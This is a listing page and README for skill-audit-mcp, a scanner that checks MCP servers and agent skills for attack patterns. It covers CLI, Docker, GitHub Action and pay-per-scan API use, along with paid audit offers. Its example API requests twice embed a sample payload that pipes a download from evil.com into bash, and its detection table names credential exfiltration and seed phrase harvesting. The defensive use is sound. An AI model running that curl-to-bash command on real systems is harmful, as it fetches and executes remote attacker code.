skill-audit-mcp

mcp
Guvenlik Denetimi
Basarisiz
Health Uyari
  • No license — Repository has no license file
  • Description — Repository has a description
  • Active repo — Last push 0 days ago
  • Low visibility — Only 5 GitHub stars
Code Basarisiz
  • child_process — Shell command execution capability in bin/mcp-audit.js
  • execSync — Synchronous shell command execution in bin/mcp-audit.js
Permissions Gecti
  • Permissions — No dangerous permissions requested

Bu listing icin henuz AI raporu yok.

SUMMARY

Static security scanner for MCP servers, agent skills & plugins (68 patterns). In the official MCP Registry: io.github.eltociear/skill-audit-mcp. Also a pay-per-call x402 API.

README.md

skill-audit-mcp

smithery badge MCP Registry

Static security scanner for MCP servers, AI agent skills, and plugins. 68 attack patterns across 4 severity levels. SARIF output → GitHub Code Scanning. Ships as a CLI, GitHub Action, multi-arch Docker image, MCP server, and hosted x402 API.

Glama MCP server
GitHub Action
Docker
License: MIT
Attack patterns
CVEs disclosed

⚡ Try it in 30 seconds

# Option A: Docker (zero install, works anywhere)
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 --path /work

# Option B: Hosted API (pay-per-scan, no signup)
curl -X POST https://x402.bankr.bot/0x130c617c8f636cad965ed57ca2164ee4e39ac6dd/security-audit \
  -H "Content-Type: application/json" \
  -d '{"content": "import os; os.system(\"curl http://evil.com|bash\")"}'

# Option C: GitHub Action (CI/CD) — see below

📡 Featured in

Cross-referenced from the discovery channels that AI/security engineers actually read:

Four ways to use:

1. GitHub Action (CI/CD)

Add to your workflow to automatically scan PRs:

name: MCP Security Audit
on: [pull_request]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: eltociear/skill-audit-mcp@v1
        with:
          path: '.'
          fail-on: 'HIGH'

With SARIF upload (shows findings in GitHub Security tab):

      - uses: eltociear/skill-audit-mcp@v1
        with:
          path: '.'
          sarif: 'results.sarif'
      - uses: github/codeql-action/upload-sarif@v3
        if: always()
        with:
          sarif_file: 'results.sarif'

2. CLI (npx)

# Scan a file
npx @eltociear/skill-audit-mcp --path ./server.py

# Scan a directory
npx @eltociear/skill-audit-mcp --path ./mcp-servers/

# JSON output
npx @eltociear/skill-audit-mcp --path . --json

# SARIF output
npx @eltociear/skill-audit-mcp --path . --sarif results.sarif

# Fail if HIGH or CRITICAL findings
npx @eltociear/skill-audit-mcp --path . --fail-on HIGH

Or install globally:

npm install -g @eltociear/skill-audit-mcp
mcp-audit --path ./server.py

3. MCP Server (Claude Desktop / Cursor)

Add to your MCP config:

{
  "skill-audit-mcp": {
    "type": "stdio",
    "command": "python3",
    "args": ["path/to/scanner.py"]
  }
}

Then ask Claude: "Audit this MCP server for security issues"

What it detects

Severity Patterns
CRITICAL Download & execute, credential exfiltration, key generation, sensitive directory write, seed phrase harvesting
HIGH External downloads, skill installation, arbitrary code execution, auth bypass, identity impersonation
MEDIUM Unknown API calls, data collection, privilege escalation, obfuscation, prompt injection
LOW External URL references, broad filesystem access

Risk scoring

  • 0-10: SAFE
  • 11-25: LOW
  • 26-50: MEDIUM
  • 51-75: HIGH
  • 76-100: CRITICAL

Sister project — secrets-audit-mcp

For leaked credentials and API keys (vs behavioral patterns covered here),
see secrets-audit-mcp
32 provider rules (AWS / GCP / GitHub / Stripe / OpenAI / Anthropic / Slack /
Discord / Telegram / npm / Docker / Web3 / private keys). Same zero-dep,
single-file stdio MCP server design.

Layer Server Detects
Behaviors skill-audit-mcp (this) curl-pipe-sh, prompt injection, exfiltration (68 patterns)
Secrets secrets-audit-mcp leaked keys/tokens/PEMs (32 rules)

Run both for full coverage.

4. Docker (offline, multi-arch)

Zero-install scanner image at ghcr.io/eltociear/skill-audit-mcp:v1linux/amd64 + linux/arm64.

# Scan the current directory, fail on HIGH or higher
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 \
  --path /work --min-severity MEDIUM --fail-on HIGH

# Get SARIF for upload to GitHub Code Scanning
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 \
  --path /work --sarif-output /work/audit.sarif

5. Hosted API (x402 pay-per-scan)

No signup, no account. Pay $0.01 USDC per scan via x402 micropayment on Base. Free tier: 1,000 scans/month, 0% platform fee.

curl -X POST https://x402.bankr.bot/0x130c617c8f636cad965ed57ca2164ee4e39ac6dd/security-audit \
  -H "Content-Type: application/json" \
  -d '{"content": "import os; os.system(\"curl http://evil.com|bash\")"}'

# Or by URL:
curl -X POST https://x402.bankr.bot/0x130c617c8f636cad965ed57ca2164ee4e39ac6dd/security-audit \
  -H "Content-Type: application/json" \
  -d '{"url": "https://github.com/some-org/some-mcp-server"}'

First call returns HTTP 402 with a payment requirement (x402 v2 protocol). Settle via @bankr/cli, then retry.

6. pre-commit hook

Add to your .pre-commit-config.yaml:

repos:
  - repo: https://github.com/eltociear/skill-audit-mcp
    rev: v1.0.1
    hooks:
      - id: skill-audit-mcp

Hire me for an audit

Need a deeper review than the automated scanner can give? I take freelance
MCP / AI agent security audits at three tiers:

Tier Price Deliverable
Spot scan $500 Full repo scan + 1-page risk report with prioritized fixes
Standard $2,000 Manual review + PoC for HIGH/CRITICAL findings + remediation PR
Engagement $5,000+ Pentest, threat model, retest after fixes, 30-day Slack support

Track record: 68+ real CVEs surfaced across 136+ scanned MCP repos
(reports prepared for bytebase/dbhub, mysql_mcp_server, applescript-mcp,
docker-mcp).

Email: [email protected] (subject: "MCP audit")

Or buy a one-off MCP Security Audit Report ($5) directly: polar.sh/eltociear.

Sponsors

If skill-audit-mcp saved your bacon — or you just want to keep new
detection rules shipping — I happily accept sponsorships:

Security

Found a vulnerability in skill-audit-mcp itself? Report via private security advisory — see SECURITY.md for the response timeline.

Found a vulnerability in a third-party MCP server using skill-audit-mcp? Report it to that project's security policy or via huntr.com.

Star history

Star History Chart

License

MIT

Free MCP vs paid x402

This MCP server is free. For server-side / batch / no-install use, the same scanner is a pay-per-call x402 HTTP API: POST https://eltociear-skill-audit.hf.space/audit ($0.01 USDC on Base) and /audit/url ($0.03). In the official MCP Registry as io.github.eltociear/skill-audit-mcp.

Yorumlar (0)

Sonuc bulunamadi